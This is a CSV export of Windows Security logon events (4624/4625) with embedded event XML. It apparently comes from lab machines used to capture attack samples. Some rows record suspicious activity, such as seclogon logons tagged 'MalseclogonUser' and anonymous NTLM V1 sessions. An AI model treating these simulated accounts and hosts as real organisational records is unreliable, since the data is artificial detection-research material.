4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 65969 + + + + + Security + ICORP-DC.internal.corp + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-21-2895268558-4179327395-2773671012-1108 + EXCHANGE$ + ICORP + 0x24daa6 + 3 + NtLmSsp + NTLM + EXCHANGE + 00000000-0000-0000-0000-000000000000 + - + NTLM V2 + 0 + 0x0 + - + 192.168.111.87 + 58128 + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2019-02-02T13:17:22.562534+04:00,1549099042.562534,4624,ICORP-DC$,INTERNAL.CORP,3,Kerberos,127.0.0.1,-,ICORP-DC.internal.corp,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 65967 + + + + + Security + ICORP-DC.internal.corp + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-18 + ICORP-DC$ + INTERNAL.CORP + 0x24c879 + 3 + Kerberos + Kerberos + - + 94BA67EA-8490-3C86-6DB7-DF74C9AA4449 + - + - + 0 + 0x0 + - + 127.0.0.1 + 50151 + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +1601-01-01T04:00:00+04:00,-11644473600.0,4624,IEUser,MSEDGEWIN10,9,seclogo,::1,-,MSEDGEWIN10,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 10113 + + + + + Security + MSEDGEWIN10 + + + + + S-1-5-21-3461203602-4096304019-2269080069-1000 + IEUser + MSEDGEWIN10 + 0x2e4ce + S-1-5-21-3461203602-4096304019-2269080069-1000 + IEUser + MSEDGEWIN10 + 0x38f87e + 9 + seclogo + Negotiate + - + 00000000-0000-0000-0000-000000000000 + - + - + 0 + 0x1b90 + C:\Windows\System32\svchost.exe + ::1 + 0 + %%1833 + - + l + o + %%1843 + 0x0 + %%1843 + +" +1601-01-01T04:00:00+04:00,-11644473600.0,4624,01566S-WIN16-IR$,THREEBEESCO.COM,3,Kerberos,::1,-,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 2982101 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-18 + 01566S-WIN16-IR$ + THREEBEESCO.COM + 0x73b44c + 3 + Kerberos + Kerberos + - + E8C9AC4A-31FC-C37F-B4D7-B3217C608858 + - + - + 0 + 0x0 + - + ::1 + 64849 + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2021-12-12T21:57:52.499428+04:00,1639331872.499428,4624,lgrove,3B,3,NtLmSsp,172.16.66.19,04246W-WIN10,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 2982097 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-21-308926384-506822093-3341789130-101606 + lgrove + 3B + 0x738cf9 + 3 + NtLmSsp + NTLM + 04246W-WIN10 + 00000000-0000-0000-0000-000000000000 + - + NTLM V2 + 128 + 0x0 + - + 172.16.66.19 + 50616 + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2021-12-12T21:57:52.375084+04:00,1639331872.375084,4624,lgrove,3B,3,NtLmSsp,172.16.66.19,04246W-WIN10,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 2982092 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-21-308926384-506822093-3341789130-101606 + lgrove + 3B + 0x738ce4 + 3 + NtLmSsp + NTLM + 04246W-WIN10 + 00000000-0000-0000-0000-000000000000 + - + NTLM V2 + 128 + 0x0 + - + 172.16.66.19 + 50614 + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2021-12-12T21:57:52.366793+04:00,1639331872.366793,4624,lgrove,3B,3,NtLmSsp,172.16.66.19,04246W-WIN10,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 2982089 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-21-308926384-506822093-3341789130-101606 + lgrove + 3B + 0x738afd + 3 + NtLmSsp + NTLM + 04246W-WIN10 + 00000000-0000-0000-0000-000000000000 + - + NTLM V2 + 128 + 0x0 + - + 172.16.66.19 + 50613 + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2021-12-12T21:57:52.313673+04:00,1639331872.313673,4624,lgrove,THREEBEESCO.COM,3,Kerberos,172.16.66.19,-,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 2982084 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-21-308926384-506822093-3341789130-101606 + lgrove + THREEBEESCO.COM + 0x738ae4 + 3 + Kerberos + Kerberos + - + DCED4BA6-CF24-37EF-0627-B0E4EED7F565 + - + - + 0 + 0x0 + - + 172.16.66.19 + 50609 + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2021-12-07T21:33:01.619364+04:00,1638898381.619364,4624,IEUser,MSEDGEWIN10,9,seclogo,::1,-,MSEDGEWIN10,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 329918 + + + + + Security + MSEDGEWIN10 + + + + + S-1-5-21-3461203602-4096304019-2269080069-1000 + IEUser + MSEDGEWIN10 + 0x53ca2 + S-1-5-21-3461203602-4096304019-2269080069-1000 + IEUser + MSEDGEWIN10 + 0x16e3db3 + 9 + seclogo + Negotiate + - + 00000000-0000-0000-0000-000000000000 + - + - + 0 + 0x1bc4 + C:\Windows\System32\svchost.exe + ::1 + 0 + %%1833 + - + MalseclogonUser + MalseclogonDomain + %%1843 + 0x0 + %%1842 + +" +2022-05-01T08:42:00.800072+04:00,1651380120.800072,4624,Administrator,WINLAB.LOCAL,3,Kerberos,192.168.1.219,-,wind10.winlab.local,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 21373 + + + + + Security + wind10.winlab.local + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-21-81107902-1099128984-1836738286-500 + Administrator + WINLAB.LOCAL + 0x82215a + 3 + Kerberos + Kerberos + - + 59CEFB69-4F9D-7486-C449-471E00B814E3 + - + - + 0 + 0x0 + - + 192.168.1.219 + 63652 + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2022-05-01T08:41:54.272334+04:00,1651380114.272334,4624,Administrator,WINLAB.LOCAL,3,Kerberos,192.168.1.219,-,wind10.winlab.local,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 21371 + + + + + Security + wind10.winlab.local + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-21-81107902-1099128984-1836738286-500 + Administrator + WINLAB.LOCAL + 0x821f28 + 3 + Kerberos + Kerberos + - + 59CEFB69-4F9D-7486-C449-471E00B814E3 + - + - + 0 + 0x0 + - + 192.168.1.219 + 63652 + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2022-05-01T08:41:47.653255+04:00,1651380107.653255,4624,Administrator,WINLAB.LOCAL,3,Kerberos,192.168.1.219,-,wind10.winlab.local,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 21369 + + + + + Security + wind10.winlab.local + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-21-81107902-1099128984-1836738286-500 + Administrator + WINLAB.LOCAL + 0x821aab + 3 + Kerberos + Kerberos + - + 59CEFB69-4F9D-7486-C449-471E00B814E3 + - + - + 0 + 0x0 + - + 192.168.1.219 + 63652 + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2022-05-01T08:41:37.642369+04:00,1651380097.642369,4624,Administrator,WINLAB.LOCAL,3,Kerberos,192.168.1.219,-,wind10.winlab.local,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 21367 + + + + + Security + wind10.winlab.local + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-21-81107902-1099128984-1836738286-500 + Administrator + WINLAB.LOCAL + 0x820d61 + 3 + Kerberos + Kerberos + - + 59CEFB69-4F9D-7486-C449-471E00B814E3 + - + - + 0 + 0x0 + - + 192.168.1.219 + 63640 + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2019-11-15T12:19:17.134469+04:00,1573805957.134469,4624,ANONYMOUS LOGON,NT AUTHORITY,3,NtLmSsp,127.0.0.1,-,alice.insecurebank.local,Security," + + + + + 4624 + 1 + 0 + 12544 + 0 + 0x8020000000000000 + + + 25049 + + + + + Security + alice.insecurebank.local + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-7 + ANONYMOUS LOGON + NT AUTHORITY + 0x1d12916 + 3 + NtLmSsp + NTLM + - + 00000000-0000-0000-0000-000000000000 + - + NTLM V1 + 128 + 0x0 + - + 127.0.0.1 + 59336 + %%1833 + +" +1601-01-01T04:00:00+04:00,-11644473600.0,4624,01566S-WIN16-IR$,THREEBEESCO.COM,3,Kerberos,::1,-,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 2171296 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-18 + 01566S-WIN16-IR$ + THREEBEESCO.COM + 0x21aadb8 + 3 + Kerberos + Kerberos + - + 860D1189-6C67-C57B-59ED-C0676A052019 + - + - + 0 + 0x0 + - + ::1 + 62863 + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2020-09-02T15:47:57.263194+04:00,1599047277.263194,4624,01566S-WIN16-IR$,THREEBEESCO.COM,3,Kerberos,::1,-,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 2171295 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-18 + 01566S-WIN16-IR$ + THREEBEESCO.COM + 0x21aad4a + 3 + Kerberos + Kerberos + - + 860D1189-6C67-C57B-59ED-C0676A052019 + - + - + 0 + 0x0 + - + ::1 + 62862 + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2020-09-02T15:47:57.252932+04:00,1599047277.252932,4624,01566S-WIN16-IR$,THREEBEESCO.COM,3,Kerberos,::1,-,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 2171294 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-18 + 01566S-WIN16-IR$ + THREEBEESCO.COM + 0x21aa47f + 3 + Kerberos + Kerberos + - + 27FCE179-F80F-F6A6-7DF4-C247E783B072 + - + - + 0 + 0x0 + - + ::1 + 62860 + %%1840 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2020-09-02T15:47:48.959767+04:00,1599047268.959767,4624,a-jbrown,THREEBEESCO.COM,3,Kerberos,172.16.66.142,-,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 2171292 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-21-308926384-506822093-3341789130-1106 + a-jbrown + THREEBEESCO.COM + 0x21a8c9a + 3 + Kerberos + Kerberos + - + 467413FE-B054-D9AE-C758-B41105A3ECA9 + - + - + 0 + 0x0 + - + 172.16.66.142 + 60726 + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2020-09-02T15:47:48.842119+04:00,1599047268.842119,4624,a-jbrown,THREEBEESCO.COM,3,Kerberos,172.16.66.142,-,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 2171291 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-21-308926384-506822093-3341789130-1106 + a-jbrown + THREEBEESCO.COM + 0x21a8c80 + 3 + Kerberos + Kerberos + - + 467413FE-B054-D9AE-C758-B41105A3ECA9 + - + - + 0 + 0x0 + - + 172.16.66.142 + 60728 + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2020-09-02T15:47:48.823276+04:00,1599047268.823276,4624,a-jbrown,3B,3,NtLmSsp,172.16.66.142,04246W-WIN10,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 2171290 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-21-308926384-506822093-3341789130-1106 + a-jbrown + 3B + 0x21a8c68 + 3 + NtLmSsp + NTLM + 04246W-WIN10 + 00000000-0000-0000-0000-000000000000 + - + NTLM V2 + 128 + 0x0 + - + 172.16.66.142 + 60726 + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2019-05-11T21:10:10.889320+04:00,1557594610.88932,4624,IEUser,IEWIN7,9,seclogo,::1,,IEWIN7,Security," + + + + + 4624 + 0 + 0 + 12544 + 0 + 0x8020000000000000 + + + 18206 + + + + + Security + IEWIN7 + + + + + S-1-5-21-3583694148-1414552638-2922671848-1000 + IEUser + IEWIN7 + 0x1371b + S-1-5-21-3583694148-1414552638-2922671848-1000 + IEUser + IEWIN7 + 0x1bbdce + 9 + seclogo + Negotiate + + 00000000-0000-0000-0000-000000000000 + - + - + 0 + 0x3c8 + C:\Windows\System32\svchost.exe + ::1 + 0 + +" +1601-01-01T04:00:00+04:00,-11644473600.0,4624,01566S-WIN16-IR$,THREEBEESCO.COM,3,Kerberos,::1,-,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 769798 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-18 + 01566S-WIN16-IR$ + THREEBEESCO.COM + 0x85516e + 3 + Kerberos + Kerberos + - + 063B0961-D1B7-6D2C-1FF3-98764C4FAC9D + - + - + 0 + 0x0 + - + ::1 + 53668 + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2020-09-17T14:57:44.272505+04:00,1600340264.272505,4624,Administrator,3B,3,NtLmSsp,172.16.66.37,02694W-WIN10,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 769794 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-21-308926384-506822093-3341789130-500 + Administrator + 3B + 0x853237 + 3 + NtLmSsp + NTLM + 02694W-WIN10 + 00000000-0000-0000-0000-000000000000 + - + NTLM V2 + 128 + 0x0 + - + 172.16.66.37 + 49959 + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2020-09-15T23:32:10.232423+04:00,1600198330.232423,4624,01566S-WIN16-IR$,THREEBEESCO.COM,3,Kerberos,::1,-,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 768628 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-18 + 01566S-WIN16-IR$ + THREEBEESCO.COM + 0x32a0d3 + 3 + Kerberos + Kerberos + - + 6747BCF0-DBAA-F21C-878B-EB339B03FA80 + - + - + 0 + 0x0 + - + ::1 + 50441 + %%1840 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2020-09-15T23:31:34.957514+04:00,1600198294.957514,4624,01566S-WIN16-IR$,THREEBEESCO.COM,3,Kerberos,::1,-,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 768627 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-18 + 01566S-WIN16-IR$ + THREEBEESCO.COM + 0x329baa + 3 + Kerberos + Kerberos + - + 1EC715BD-2DAC-8C05-8940-40F79E2D2D52 + - + - + 0 + 0x0 + - + ::1 + 50443 + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2020-09-15T23:31:31.097681+04:00,1600198291.097681,4624,01566S-WIN16-IR$,THREEBEESCO.COM,3,Kerberos,::1,-,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 768622 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-18 + 01566S-WIN16-IR$ + THREEBEESCO.COM + 0x320935 + 3 + Kerberos + Kerberos + - + 1EC715BD-2DAC-8C05-8940-40F79E2D2D52 + - + - + 0 + 0x0 + - + ::1 + 50438 + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2020-09-15T23:31:04.688967+04:00,1600198264.688967,4624,ANONYMOUS LOGON,NT AUTHORITY,3,NtLmSsp,172.16.66.37,02694W-WIN10,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 768621 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-7 + ANONYMOUS LOGON + NT AUTHORITY + 0x31ff89 + 3 + NtLmSsp + NTLM + 02694W-WIN10 + 00000000-0000-0000-0000-000000000000 + - + NTLM V1 + 128 + 0x0 + - + 172.16.66.37 + 49707 + %%1833 + - + - + - + %%1843 + 0x0 + %%1843 + +" +2020-09-15T23:30:32.190369+04:00,1600198232.190369,4624,ANONYMOUS LOGON,NT AUTHORITY,3,NtLmSsp,172.16.66.37,02694W-WIN10,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 768620 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-7 + ANONYMOUS LOGON + NT AUTHORITY + 0x31ff6e + 3 + NtLmSsp + NTLM + 02694W-WIN10 + 00000000-0000-0000-0000-000000000000 + - + NTLM V1 + 128 + 0x0 + - + 172.16.66.37 + 49707 + %%1833 + - + - + - + %%1843 + 0x0 + %%1843 + +" +2020-09-15T23:29:51.517594+04:00,1600198191.517594,4624,01566S-WIN16-IR$,THREEBEESCO.COM,3,Kerberos,::1,-,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 768619 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-18 + 01566S-WIN16-IR$ + THREEBEESCO.COM + 0x31fb1a + 3 + Kerberos + Kerberos + - + 1EC715BD-2DAC-8C05-8940-40F79E2D2D52 + - + - + 0 + 0x0 + - + ::1 + 50437 + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2020-09-15T23:29:51.507713+04:00,1600198191.507713,4624,01566S-WIN16-IR$,THREEBEESCO.COM,3,Kerberos,::1,-,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 768618 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-18 + 01566S-WIN16-IR$ + THREEBEESCO.COM + 0x31daf6 + 3 + Kerberos + Kerberos + - + 1EC715BD-2DAC-8C05-8940-40F79E2D2D52 + - + - + 0 + 0x0 + - + ::1 + 50436 + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +1601-01-01T04:00:00+04:00,-11644473600.0,4624,IEUser,MSEDGEWIN10,2,Chrome,-,MSEDGEWIN10,MSEDGEWIN10,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 137225 + + + + + Security + MSEDGEWIN10 + + + + + S-1-5-21-3461203602-4096304019-2269080069-1000 + IEUser + MSEDGEWIN10 + 0x79e59 + S-1-5-21-3461203602-4096304019-2269080069-1000 + IEUser + MSEDGEWIN10 + 0x1cd964 + 2 + Chrome + Negotiate + MSEDGEWIN10 + 00000000-0000-0000-0000-000000000000 + - + - + 0 + 0x1358 + C:\Program Files (x86)\Google\Chrome\Application\chrome.exe + - + - + %%1833 + - + - + - + %%1843 + 0x1cd8f6 + %%1843 + +" +2020-09-09T17:18:27.714758+04:00,1599657507.714758,4624,IEUser,MSEDGEWIN10,2,Chrome,-,MSEDGEWIN10,MSEDGEWIN10,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 137224 + + + + + Security + MSEDGEWIN10 + + + + + S-1-5-21-3461203602-4096304019-2269080069-1000 + IEUser + MSEDGEWIN10 + 0x79e59 + S-1-5-21-3461203602-4096304019-2269080069-1000 + IEUser + MSEDGEWIN10 + 0x1cd8f6 + 2 + Chrome + Negotiate + MSEDGEWIN10 + 00000000-0000-0000-0000-000000000000 + - + - + 0 + 0x1358 + C:\Program Files (x86)\Google\Chrome\Application\chrome.exe + - + - + %%1833 + - + - + - + %%1843 + 0x1cd964 + %%1842 + +" +2020-09-09T17:18:27.714613+04:00,1599657507.714613,4624,SYSTEM,NT AUTHORITY,5,Advapi,-,-,MSEDGEWIN10,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 137223 + + + + + Security + MSEDGEWIN10 + + + + + S-1-5-18 + MSEDGEWIN10$ + WORKGROUP + 0x3e7 + S-1-5-18 + SYSTEM + NT AUTHORITY + 0x3e7 + 5 + Advapi + Negotiate + - + 00000000-0000-0000-0000-000000000000 + - + - + 0 + 0x25c + C:\Windows\System32\services.exe + - + - + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2020-09-09T17:18:25.377120+04:00,1599657505.37712,4625,IEUser,MSEDGEWIN10,2,Chrome,-,MSEDGEWIN10,MSEDGEWIN10,Security," + + + + + 4625 + 0 + 0 + 12544 + 0 + 0x8010000000000000 + + + 137222 + + + + + Security + MSEDGEWIN10 + + + + + S-1-5-21-3461203602-4096304019-2269080069-1000 + IEUser + MSEDGEWIN10 + 0x79e59 + S-1-0-0 + IEUser + MSEDGEWIN10 + 0xc000006d + %%2313 + 0xc000006a + 2 + Chrome + Negotiate + MSEDGEWIN10 + - + - + 0 + 0x1358 + C:\Program Files (x86)\Google\Chrome\Application\chrome.exe + - + - + +" +2022-02-16T14:37:25.097894+04:00,1645007845.097894,4624,01566S-WIN16-IR$,THREEBEESCO.COM,3,Kerberos,::1,-,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 2988550 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-18 + 01566S-WIN16-IR$ + THREEBEESCO.COM + 0x568d99 + 3 + Kerberos + Kerberos + - + B683BAFB-5884-30E1-12DA-31368F04511D + - + - + 0 + 0x0 + - + ::1 + 64229 + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2022-02-16T14:37:22.920925+04:00,1645007842.920925,4624,01566S-WIN16-IR$,THREEBEESCO.COM,3,Kerberos,::1,-,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 2988547 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-18 + 01566S-WIN16-IR$ + THREEBEESCO.COM + 0x56874b + 3 + Kerberos + Kerberos + - + B683BAFB-5884-30E1-12DA-31368F04511D + - + - + 0 + 0x0 + - + ::1 + 64227 + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2022-02-16T14:37:22.906213+04:00,1645007842.906213,4624,01566S-WIN16-IR$,THREEBEESCO.COM,3,Kerberos,::1,-,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 2988544 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-18 + 01566S-WIN16-IR$ + THREEBEESCO.COM + 0x5686d9 + 3 + Kerberos + Kerberos + - + B683BAFB-5884-30E1-12DA-31368F04511D + - + - + 0 + 0x0 + - + ::1 + 64226 + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2022-02-16T14:37:20.521180+04:00,1645007840.52118,4624,samir,3B,3,NtLmSsp,-,02694W-WIN10,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 2988535 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-21-308926384-506822093-3341789130-220106 + samir + 3B + 0x567758 + 3 + NtLmSsp + NTLM + 02694W-WIN10 + 00000000-0000-0000-0000-000000000000 + - + NTLM V2 + 128 + 0x0 + - + - + - + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2022-02-16T14:37:20.450532+04:00,1645007840.450532,4624,samir,3B,3,NtLmSsp,172.16.66.25,02694W-WIN10,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 2988529 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-21-308926384-506822093-3341789130-220106 + samir + 3B + 0x567515 + 3 + NtLmSsp + NTLM + 02694W-WIN10 + 00000000-0000-0000-0000-000000000000 + - + NTLM V2 + 128 + 0x0 + - + 172.16.66.25 + 50251 + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2022-02-16T14:37:19.725428+04:00,1645007839.725428,4624,01566S-WIN16-IR$,THREEBEESCO.COM,3,Kerberos,::1,-,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 2988525 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-18 + 01566S-WIN16-IR$ + THREEBEESCO.COM + 0x56738f + 3 + Kerberos + Kerberos + - + B683BAFB-5884-30E1-12DA-31368F04511D + - + - + 0 + 0x0 + - + ::1 + 64223 + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2022-02-16T14:37:19.637257+04:00,1645007839.637257,4624,02694W-WIN10$,THREEBEESCO.COM,3,Kerberos,172.16.66.25,-,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 2988522 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-21-308926384-506822093-3341789130-84104 + 02694W-WIN10$ + THREEBEESCO.COM + 0x567343 + 3 + Kerberos + Kerberos + - + 429CA5A3-EDFC-5657-17C3-C050C7B047F4 + - + - + 0 + 0x0 + - + 172.16.66.25 + 50250 + %%1840 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2020-09-23T20:50:17.200140+04:00,1600879817.20014,4624,Administrator,3B,3,NtLmSsp,172.16.66.37,-,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 772611 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-21-308926384-506822093-3341789130-500 + Administrator + 3B + 0x1137987 + 3 + NtLmSsp + NTLM + - + 00000000-0000-0000-0000-000000000000 + - + NTLM V2 + 128 + 0x0 + - + 172.16.66.37 + 50107 + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2020-09-23T20:50:17.194314+04:00,1600879817.194314,4624,SYSTEM,NT AUTHORITY,5,Advapi,-,-,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 772609 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + S-1-5-18 + 01566S-WIN16-IR$ + 3B + 0x3e7 + S-1-5-18 + SYSTEM + NT AUTHORITY + 0x3e7 + 5 + Advapi + Negotiate + - + 00000000-0000-0000-0000-000000000000 + - + - + 0 + 0x244 + C:\Windows\System32\services.exe + - + - + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2020-09-23T20:50:16.702981+04:00,1600879816.702981,4624,Administrator,3B,3,NtLmSsp,172.16.66.37,-,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 772607 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-21-308926384-506822093-3341789130-500 + Administrator + 3B + 0x1136e95 + 3 + NtLmSsp + NTLM + - + 00000000-0000-0000-0000-000000000000 + - + NTLM V2 + 128 + 0x0 + - + 172.16.66.37 + 50106 + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2020-09-15T23:32:10.232423+04:00,1600198330.232423,4624,01566S-WIN16-IR$,THREEBEESCO.COM,3,Kerberos,::1,-,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 768628 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-18 + 01566S-WIN16-IR$ + THREEBEESCO.COM + 0x32a0d3 + 3 + Kerberos + Kerberos + - + 